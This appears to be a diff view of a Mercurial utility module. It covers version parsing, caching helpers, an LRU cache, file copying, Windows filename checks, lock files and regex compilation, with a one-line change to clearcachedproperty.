998 998 >>> versiontuple(v, 2)
999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keywords args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new code. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 1340 def clear(self):
1341 1341 n = self._head
1342 1342 while n.key is not _notset:
1343 1343 self.totalcost -= n.cost
1344 1344 n.markempty()
1345 1345 n = n.next
1346 1346
1347 1347 self._cache.clear()
1348 1348
1349 1349 def copy(self, capacity=None, maxcost=0):
1350 1350 """Create a new cache as a copy of the current one.
1351 1351
1352 1352 By default, the new cache has the same capacity as the existing one.
1353 1353 But, the cache capacity can be changed as part of performing the
1354 1354 copy.
1355 1355
1356 1356 Items in the copy have an insertion/access order matching this
1357 1357 instance.
1358 1358 """
1359 1359
1360 1360 capacity = capacity or self.capacity
1361 1361 maxcost = maxcost or self.maxcost
1362 1362 result = lrucachedict(capacity, maxcost=maxcost)
1363 1363
1364 1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1365 # has the correct ordering.
1366 1366
1367 1367 # Find the first non-empty entry.
1368 1368 n = self._head.prev
1369 1369 while n.key is _notset and n is not self._head:
1370 1370 n = n.prev
1371 1371
1372 1372 # We could potentially skip the first N items when decreasing capacity.
1373 1373 # But let's keep it simple unless it is a performance problem.
1374 1374 for i in range(len(self._cache)):
1375 1375 result.insert(n.key, n.value, cost=n.cost)
1376 1376 n = n.prev
1377 1377
1378 1378 return result
1379 1379
1380 1380 def popoldest(self):
1381 1381 """Remove the oldest item from the cache.
1382 1382
1383 1383 Returns the (key, value) describing the removed cache entry.
1384 1384 """
1385 1385 if not self._cache:
1386 1386 return
1387 1387
1388 1388 # Walk the linked list backwards starting at tail node until we hit
1389 1389 # a non-empty node.
1390 1390 n = self._head.prev
1391 1391 while n.key is _notset:
1392 1392 n = n.prev
1393 1393
1394 1394 key, value = n.key, n.value
1395 1395
1396 1396 # And remove it from the cache and mark it as empty.
1397 1397 del self._cache[n.key]
1398 1398 self.totalcost -= n.cost
1399 1399 n.markempty()
1400 1400
1401 1401 return key, value
1402 1402
1403 1403 def _movetohead(self, node):
1404 1404 """Mark a node as the newest, making it the new head.
1405 1405
1406 1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 1407 list, which is denoted by self._head.
1408 1408
1409 1409 Visually, let's make ``N`` the new head node (* denotes head):
1410 1410
1411 1411 previous/oldest <-> head <-> next/next newest
1412 1412
1413 1413 ----<->--- A* ---<->-----
1414 1414 | |
1415 1415 E <-> D <-> N <-> C <-> B
1416 1416
1417 1417 To:
1418 1418
1419 1419 ----<->--- N* ---<->-----
1420 1420 | |
1421 1421 E <-> D <-> C <-> B <-> A
1422 1422
1423 1423 This requires the following moves:
1424 1424
1425 1425 C.next = D (node.prev.next = node.next)
1426 1426 D.prev = C (node.next.prev = node.prev)
1427 1427 E.next = N (head.prev.next = node)
1428 1428 N.prev = E (node.prev = head.prev)
1429 1429 N.next = A (node.next = head)
1430 1430 A.prev = N (head.prev = node)
1431 1431 """
1432 1432 head = self._head
1433 1433 # C.next = D
1434 1434 node.prev.next = node.next
1435 1435 # D.prev = C
1436 1436 node.next.prev = node.prev
1437 1437 # N.prev = E
1438 1438 node.prev = head.prev
1439 1439 # N.next = A
1440 1440 # It is tempting to do just "head" here, however if node is
1441 1441 # adjacent to head, this will do bad things.
1442 1442 node.next = head.prev.next
1443 1443 # E.next = N
1444 1444 node.next.prev = node
1445 1445 # A.prev = N
1446 1446 node.prev.next = node
1447 1447
1448 1448 self._head = node
1449 1449
1450 1450 def _addcapacity(self):
1451 1451 """Add a node to the circular linked list.
1452 1452
1453 1453 The new node is inserted before the head node.
1454 1454 """
1455 1455 head = self._head
1456 1456 node = _lrucachenode()
1457 1457 head.prev.next = node
1458 1458 node.prev = head.prev
1459 1459 node.next = head
1460 1460 head.prev = node
1461 1461 self._size += 1
1462 1462 return node
1463 1463
1464 1464 def _enforcecostlimit(self):
1465 1465 # This should run after an insertion. It should only be called if total
1466 1466 # cost limits are being enforced.
1467 1467 # The most recently inserted node is never evicted.
1468 1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1469 return
1470 1470
1471 1471 # This is logically equivalent to calling popoldest() until we
1472 1472 # free up enough cost. We don't do that since popoldest() needs
1473 1473 # to walk the linked list and doing this in a loop would be
1474 1474 # quadratic. So we find the first non-empty node and then
1475 1475 # walk nodes until we free up enough capacity.
1476 1476 #
1477 1477 # If we only removed the minimum number of nodes to free enough
1478 1478 # cost at insert time, chances are high that the next insert would
1479 1479 # also require pruning. This would effectively constitute quadratic
1480 1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1481 # target cost that is a percentage of the max cost. This will tend
1482 1482 # to free more nodes when the high water mark is reached, which
1483 1483 # lowers the chances of needing to prune on the subsequent insert.
1484 1484 targetcost = int(self.maxcost * 0.75)
1485 1485
1486 1486 n = self._head.prev
1487 1487 while n.key is _notset:
1488 1488 n = n.prev
1489 1489
1490 1490 while len(self) > 1 and self.totalcost > targetcost:
1491 1491 del self._cache[n.key]
1492 1492 self.totalcost -= n.cost
1493 1493 n.markempty()
1494 1494 n = n.prev
1495 1495
1496 1496 def lrucachefunc(func):
1497 1497 '''cache most recent results of function calls'''
1498 1498 cache = {}
1499 1499 order = collections.deque()
1500 1500 if func.__code__.co_argcount == 1:
1501 1501 def f(arg):
1502 1502 if arg not in cache:
1503 1503 if len(cache) > 20:
1504 1504 del cache[order.popleft()]
1505 1505 cache[arg] = func(arg)
1506 1506 else:
1507 1507 order.remove(arg)
1508 1508 order.append(arg)
1509 1509 return cache[arg]
1510 1510 else:
1511 1511 def f(*args):
1512 1512 if args not in cache:
1513 1513 if len(cache) > 20:
1514 1514 del cache[order.popleft()]
1515 1515 cache[args] = func(*args)
1516 1516 else:
1517 1517 order.remove(args)
1518 1518 order.append(args)
1519 1519 return cache[args]
1520 1520
1521 1521 return f
1522 1522
1523 1523 class propertycache(object):
1524 1524 def __init__(self, func):
1525 1525 self.func = func
1526 1526 self.name = func.__name__
1527 1527 def __get__(self, obj, type=None):
1528 1528 result = self.func(obj)
1529 1529 self.cachevalue(obj, result)
1530 1530 return result
1531 1531
1532 1532 def cachevalue(self, obj, value):
1533 1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1534 obj.__dict__[self.name] = value
1535 1535
1536 1536 def clearcachedproperty(obj, prop):
1537 1537 '''clear a cached property value, if one has been set'''
1538 prop = pycompat.sysstr(prop)
1538 1539 if prop in obj.__dict__:
1539 1540 del obj.__dict__[prop]
1540 1541
1541 1542 def increasingchunks(source, min=1024, max=65536):
1542 1543 '''return no less than min bytes per chunk while data remains,
1543 1544 doubling min after each chunk until it reaches max'''
1544 1545 def log2(x):
1545 1546 if not x:
1546 1547 return 0
1547 1548 i = 0
1548 1549 while x:
1549 1550 x >>= 1
1550 1551 i += 1
1551 1552 return i - 1
1552 1553
1553 1554 buf = []
1554 1555 blen = 0
1555 1556 for chunk in source:
1556 1557 buf.append(chunk)
1557 1558 blen += len(chunk)
1558 1559 if blen >= min:
1559 1560 if min < max:
1560 1561 min = min << 1
1561 1562 nmin = 1 << log2(blen)
1562 1563 if nmin > min:
1563 1564 min = nmin
1564 1565 if min > max:
1565 1566 min = max
1566 1567 yield ''.join(buf)
1567 1568 blen = 0
1568 1569 buf = []
1569 1570 if buf:
1570 1571 yield ''.join(buf)
1571 1572
1572 1573 def always(fn):
1573 1574 return True
1574 1575
1575 1576 def never(fn):
1576 1577 return False
1577 1578
1578 1579 def nogc(func):
1579 1580 """disable garbage collector
1580 1581
1581 1582 Python's garbage collector triggers a GC each time a certain number of
1582 1583 container objects (the number being defined by gc.get_threshold()) are
1583 1584 allocated even when marked not to be tracked by the collector. Tracking has
1584 1585 no effect on when GCs are triggered, only on what objects the GC looks
1585 1586 into. As a workaround, disable GC while building complex (huge)
1586 1587 containers.
1587 1588
1588 1589 This garbage collector issue have been fixed in 2.7. But it still affect
1589 1590 CPython's performance.
1590 1591 """
1591 1592 def wrapper(*args, **kwargs):
1592 1593 gcenabled = gc.isenabled()
1593 1594 gc.disable()
1594 1595 try:
1595 1596 return func(*args, **kwargs)
1596 1597 finally:
1597 1598 if gcenabled:
1598 1599 gc.enable()
1599 1600 return wrapper
1600 1601
1601 1602 if pycompat.ispypy:
1602 1603 # PyPy runs slower with gc disabled
1603 1604 nogc = lambda x: x
1604 1605
1605 1606 def pathto(root, n1, n2):
1606 1607 '''return the relative path from one place to another.
1607 1608 root should use os.sep to separate directories
1608 1609 n1 should use os.sep to separate directories
1609 1610 n2 should use "/" to separate directories
1610 1611 returns an os.sep-separated path.
1611 1612
1612 1613 If n1 is a relative path, it's assumed it's
1613 1614 relative to root.
1614 1615 n2 should always be relative to root.
1615 1616 '''
1616 1617 if not n1:
1617 1618 return localpath(n2)
1618 1619 if os.path.isabs(n1):
1619 1620 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 1621 return os.path.join(root, localpath(n2))
1621 1622 n2 = '/'.join((pconvert(root), n2))
1622 1623 a, b = splitpath(n1), n2.split('/')
1623 1624 a.reverse()
1624 1625 b.reverse()
1625 1626 while a and b and a[-1] == b[-1]:
1626 1627 a.pop()
1627 1628 b.pop()
1628 1629 b.reverse()
1629 1630 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630 1631
1631 1632 # the location of data files matching the source code
1632 1633 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 1634 # executable version (py2exe) doesn't support __file__
1634 1635 datapath = os.path.dirname(pycompat.sysexecutable)
1635 1636 else:
1636 1637 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637 1638
1638 1639 i18n.setdatapath(datapath)
1639 1640
1640 1641 def checksignature(func):
1641 1642 '''wrap a function with code to check for calling errors'''
1642 1643 def check(*args, **kwargs):
1643 1644 try:
1644 1645 return func(*args, **kwargs)
1645 1646 except TypeError:
1646 1647 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 1648 raise error.SignatureError
1648 1649 raise
1649 1650
1650 1651 return check
1651 1652
1652 1653 # a whilelist of known filesystems where hardlink works reliably
1653 1654 _hardlinkfswhitelist = {
1654 1655 'apfs',
1655 1656 'btrfs',
1656 1657 'ext2',
1657 1658 'ext3',
1658 1659 'ext4',
1659 1660 'hfs',
1660 1661 'jfs',
1661 1662 'NTFS',
1662 1663 'reiserfs',
1663 1664 'tmpfs',
1664 1665 'ufs',
1665 1666 'xfs',
1666 1667 'zfs',
1667 1668 }
1668 1669
1669 1670 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 1671 '''copy a file, preserving mode and optionally other stat info like
1671 1672 atime/mtime
1672 1673
1673 1674 checkambig argument is used with filestat, and is useful only if
1674 1675 destination file is guarded by any lock (e.g. repo.lock or
1675 1676 repo.wlock).
1676 1677
1677 1678 copystat and checkambig should be exclusive.
1678 1679 '''
1679 1680 assert not (copystat and checkambig)
1680 1681 oldstat = None
1681 1682 if os.path.lexists(dest):
1682 1683 if checkambig:
1683 1684 oldstat = checkambig and filestat.frompath(dest)
1684 1685 unlink(dest)
1685 1686 if hardlink:
1686 1687 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 1688 # unless we are confident that dest is on a whitelisted filesystem.
1688 1689 try:
1689 1690 fstype = getfstype(os.path.dirname(dest))
1690 1691 except OSError:
1691 1692 fstype = None
1692 1693 if fstype not in _hardlinkfswhitelist:
1693 1694 hardlink = False
1694 1695 if hardlink:
1695 1696 try:
1696 1697 oslink(src, dest)
1697 1698 return
1698 1699 except (IOError, OSError):
1699 1700 pass # fall back to normal copy
1700 1701 if os.path.islink(src):
1701 1702 os.symlink(os.readlink(src), dest)
1702 1703 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 1704 # for them anyway
1704 1705 else:
1705 1706 try:
1706 1707 shutil.copyfile(src, dest)
1707 1708 if copystat:
1708 1709 # copystat also copies mode
1709 1710 shutil.copystat(src, dest)
1710 1711 else:
1711 1712 shutil.copymode(src, dest)
1712 1713 if oldstat and oldstat.stat:
1713 1714 newstat = filestat.frompath(dest)
1714 1715 if newstat.isambig(oldstat):
1715 1716 # stat of copied file is ambiguous to original one
1716 1717 advanced = (
1717 1718 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 1719 os.utime(dest, (advanced, advanced))
1719 1720 except shutil.Error as inst:
1720 1721 raise error.Abort(str(inst))
1721 1722
1722 1723 def copyfiles(src, dst, hardlink=None, progress=None):
1723 1724 """Copy a directory tree using hardlinks if possible."""
1724 1725 num = 0
1725 1726
1726 1727 def settopic():
1727 1728 if progress:
1728 1729 progress.topic = _('linking') if hardlink else _('copying')
1729 1730
1730 1731 if os.path.isdir(src):
1731 1732 if hardlink is None:
1732 1733 hardlink = (os.stat(src).st_dev ==
1733 1734 os.stat(os.path.dirname(dst)).st_dev)
1734 1735 settopic()
1735 1736 os.mkdir(dst)
1736 1737 for name, kind in listdir(src):
1737 1738 srcname = os.path.join(src, name)
1738 1739 dstname = os.path.join(dst, name)
1739 1740 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 1741 num += n
1741 1742 else:
1742 1743 if hardlink is None:
1743 1744 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 1745 os.stat(os.path.dirname(dst)).st_dev)
1745 1746 settopic()
1746 1747
1747 1748 if hardlink:
1748 1749 try:
1749 1750 oslink(src, dst)
1750 1751 except (IOError, OSError):
1751 1752 hardlink = False
1752 1753 shutil.copy(src, dst)
1753 1754 else:
1754 1755 shutil.copy(src, dst)
1755 1756 num += 1
1756 1757 if progress:
1757 1758 progress.increment()
1758 1759
1759 1760 return hardlink, num
1760 1761
1761 1762 _winreservednames = {
1762 1763 'con', 'prn', 'aux', 'nul',
1763 1764 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 1765 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 1766 }
1766 1767 _winreservedchars = ':*?"<>|'
1767 1768 def checkwinfilename(path):
1768 1769 r'''Check that the base-relative path is a valid filename on Windows.
1769 1770 Returns None if the path is ok, or a UI string describing the problem.
1770 1771
1771 1772 >>> checkwinfilename(b"just/a/normal/path")
1772 1773 >>> checkwinfilename(b"foo/bar/con.xml")
1773 1774 "filename contains 'con', which is reserved on Windows"
1774 1775 >>> checkwinfilename(b"foo/con.xml/bar")
1775 1776 "filename contains 'con', which is reserved on Windows"
1776 1777 >>> checkwinfilename(b"foo/bar/xml.con")
1777 1778 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 1779 "filename contains 'AUX', which is reserved on Windows"
1779 1780 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 1781 "filename contains ':', which is reserved on Windows"
1781 1782 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 1783 "filename contains '\\x07', which is invalid on Windows"
1783 1784 >>> checkwinfilename(b"foo/bar/bla ")
1784 1785 "filename ends with ' ', which is not allowed on Windows"
1785 1786 >>> checkwinfilename(b"../bar")
1786 1787 >>> checkwinfilename(b"foo\\")
1787 1788 "filename ends with '\\', which is invalid on Windows"
1788 1789 >>> checkwinfilename(b"foo\\/bar")
1789 1790 "directory name ends with '\\', which is invalid on Windows"
1790 1791 '''
1791 1792 if path.endswith('\\'):
1792 1793 return _("filename ends with '\\', which is invalid on Windows")
1793 1794 if '\\/' in path:
1794 1795 return _("directory name ends with '\\', which is invalid on Windows")
1795 1796 for n in path.replace('\\', '/').split('/'):
1796 1797 if not n:
1797 1798 continue
1798 1799 for c in _filenamebytestr(n):
1799 1800 if c in _winreservedchars:
1800 1801 return _("filename contains '%s', which is reserved "
1801 1802 "on Windows") % c
1802 1803 if ord(c) <= 31:
1803 1804 return _("filename contains '%s', which is invalid "
1804 1805 "on Windows") % stringutil.escapestr(c)
1805 1806 base = n.split('.')[0]
1806 1807 if base and base.lower() in _winreservednames:
1807 1808 return _("filename contains '%s', which is reserved "
1808 1809 "on Windows") % base
1809 1810 t = n[-1:]
1810 1811 if t in '. ' and n not in '..':
1811 1812 return _("filename ends with '%s', which is not allowed "
1812 1813 "on Windows") % t
1813 1814
1814 1815 if pycompat.iswindows:
1815 1816 checkosfilename = checkwinfilename
1816 1817 timer = time.clock
1817 1818 else:
1818 1819 checkosfilename = platform.checkosfilename
1819 1820 timer = time.time
1820 1821
1821 1822 if safehasattr(time, "perf_counter"):
1822 1823 timer = time.perf_counter
1823 1824
1824 1825 def makelock(info, pathname):
1825 1826 """Create a lock file atomically if possible
1826 1827
1827 1828 This may leave a stale lock file if symlink isn't supported and signal
1828 1829 interrupt is enabled.
1829 1830 """
1830 1831 try:
1831 1832 return os.symlink(info, pathname)
1832 1833 except OSError as why:
1833 1834 if why.errno == errno.EEXIST:
1834 1835 raise
1835 1836 except AttributeError: # no symlink in os
1836 1837 pass
1837 1838
1838 1839 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 1840 ld = os.open(pathname, flags)
1840 1841 os.write(ld, info)
1841 1842 os.close(ld)
1842 1843
1843 1844 def readlock(pathname):
1844 1845 try:
1845 1846 return readlink(pathname)
1846 1847 except OSError as why:
1847 1848 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 1849 raise
1849 1850 except AttributeError: # no symlink in os
1850 1851 pass
1851 1852 with posixfile(pathname, 'rb') as fp:
1852 1853 return fp.read()
1853 1854
1854 1855 def fstat(fp):
1855 1856 '''stat file object that may not have fileno method.'''
1856 1857 try:
1857 1858 return os.fstat(fp.fileno())
1858 1859 except AttributeError:
1859 1860 return os.stat(fp.name)
1860 1861
1861 1862 # File system features
1862 1863
1863 1864 def fscasesensitive(path):
1864 1865 """
1865 1866 Return true if the given path is on a case-sensitive filesystem
1866 1867
1867 1868 Requires a path (like /foo/.hg) ending with a foldable final
1868 1869 directory component.
1869 1870 """
1870 1871 s1 = os.lstat(path)
1871 1872 d, b = os.path.split(path)
1872 1873 b2 = b.upper()
1873 1874 if b == b2:
1874 1875 b2 = b.lower()
1875 1876 if b == b2:
1876 1877 return True # no evidence against case sensitivity
1877 1878 p2 = os.path.join(d, b2)
1878 1879 try:
1879 1880 s2 = os.lstat(p2)
1880 1881 if s2 == s1:
1881 1882 return False
1882 1883 return True
1883 1884 except OSError:
1884 1885 return True
1885 1886
1886 1887 try:
1887 1888 import re2
1888 1889 _re2 = None
1889 1890 except ImportError:
1890 1891 _re2 = False
1891 1892
1892 1893 class _re(object):
1893 1894 def _checkre2(self):
1894 1895 global _re2
1895 1896 try:
1896 1897 # check if match works, see issue3964
1897 1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 1899 except ImportError:
1899 1900 _re2 = False
1900 1901
1901 1902 def compile(self, pat, flags=0):
1902 1903 '''Compile a regular expression, using re2 if possible
1903 1904
1904 1905 For best performance, use only re2-compatible regexp features. The
1905 1906 only flags from the re module that are re2-compatible are
1906 1907 IGNORECASE and MULTILINE.'''
1907 1908 if _re2 is None:
1908 1909 self._checkre2()
1909 1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 1911 if flags & remod.IGNORECASE:
1911 1912 pat = '(?i)' + pat
1912 1913 if flags & remod.MULTILINE:
1913 1914 pat = '(?m)' + pat
1914 1915 try:
1915 1916 return re2.compile(pat)
1916 1917 except re2.error:
1917 1918 pass
1918 1919 return remod.compile(pat, flags)
1919 1920
